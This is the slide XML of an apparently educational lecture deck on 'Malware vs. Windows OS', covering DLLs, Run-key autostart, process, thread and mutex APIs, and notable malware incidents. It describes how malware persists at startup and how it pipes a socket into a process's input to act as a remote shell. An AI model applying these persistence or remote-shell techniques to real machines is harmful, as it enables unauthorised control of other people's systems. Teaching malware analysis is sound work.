            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>
          </a:solid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 mainDLL.c</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#include “myDLL.h"</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int main(){</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message();</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return 0;</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DLL example</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="662" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="663" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="5029200" cy="3931560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>
          </a:solid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 File: SampleDLL.h</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#ifndef INDLL_H</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#define INDLL_H</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#ifdef EXPORTING_DLL</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extern __declspec(dllexport) void HelloWorld()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#else</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extern __declspec(dllimport) void HelloWorld()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#endif</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#endif</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="664" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5209200" y="2950200"/>
            <a:ext cx="3934440" cy="3931560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>
          </a:solid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 SampleApp.cpp </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#include "stdafx.h"</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#include "sampleDLL.h"</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int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)</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HelloWorld();</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return 0;</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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143640" cy="1124280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="fbd4b4"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="666"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Write an API code to execute a program when Windows OS start</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API-&gt; Registry</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HKLM\Software\Microsoft\Windows\CurrentVersion\Run</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Name: myProgram</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Run: notepad.exe</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Malware vs. Windows OS</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="668" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="94000"/>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Process</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Malware can also execute code outside the current program by creating a new process or modifying an existing one.</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A process contains one or more threads that are executed by the CPU.</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Malware: </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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Own independent process (Traditionally)</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Executes as part of another process (Newer malware).</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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API commands: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>CreateProcess; GetCurrentProcess; OpenProcess</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Real-world Impacts</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="35000"/>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2010 – Stuxnet Worm</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>attacking Iran’s nuclear program and included </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>the ability to impact hardware as well as software. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="465"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>2011 — Zeus Trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>first detected in 2007, the author released the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>source code in 2011. Sometimes called Zbot, the most successful pieces of </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>botnet software in the world, impacting millions of machines. It is often </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>used to steal banking information by man-in-the-browser keystroke logging </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>and form grabbing.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="465"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>2013 – Cryptolocker</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>early ransomware programs.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="465"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>2014 – Backoff</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>compromise Point-of-Sale (POS) systems to steal credit </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>card data.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="465"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="115000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>2016 – Cerber</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>One of the heavy-hitters in the ransomware sphere.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="465"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>2017 – WannaCry Ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>brought major computer systems </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>in Russia, China, ­­the UK, and the US down, locking people out of their data </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>and demanding they pay a ransom or lose everything. The virus affected at </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>least 150 countries, including hospitals, banks, telecommunications </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>companies, warehouses, and many other industries.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US"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Malware vs. Windows OS</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="670" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="671" name="Google Shape;1236;p130" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1763640" y="1268640"/>
            <a:ext cx="5760360" cy="5265000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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Malware vs. Windows OS</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="673"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Thread</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Processes are the container for execution, but threads are what the Windows OS executes.</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To create a new thread </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>CreateThread, CreateToolhelp32Snapshot, Thread32First, Thread32Next</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="674" name="Google Shape;1244;p131" descr="Related image"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2680560" y="4005000"/>
            <a:ext cx="4715640" cy="2719440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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Malware vs. Windows OS</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="676" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="677" name="Google Shape;1251;p132" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1547640" y="1124640"/>
            <a:ext cx="6274440" cy="5320440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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Malware vs. Windows OS</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="679"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Malware can use </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>CreateThread</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> in multiple ways:</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Load a new malicious library into a process</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Create two new threads for input and output</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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One to listen on a socket or pipe 🡪 output that to standard input of a process.</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One to read from standard output 🡪 send that to a socket or pipe.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-151920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>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Malware vs. Windows OS</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="681" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="87000"/>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Mutex</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> (Mutant)</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Mutexes are global objects that coordinate multiple processes and threads.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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E.g. A </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>mutex</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> can control access of 2 threads to the memory.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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Only one thread can own a mutex at a time</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Mutex calls:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>WaitForSingleObject: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>thread gains access to the mutex.</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Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>ReleaseMutex: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>thread is finished using a mutex</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Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>CreateMutex: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>A mutex is created</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Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>OpenMutex: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Allow one process can get a handle to another process’s mutex</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Malware vs. Windows OS</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="683" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
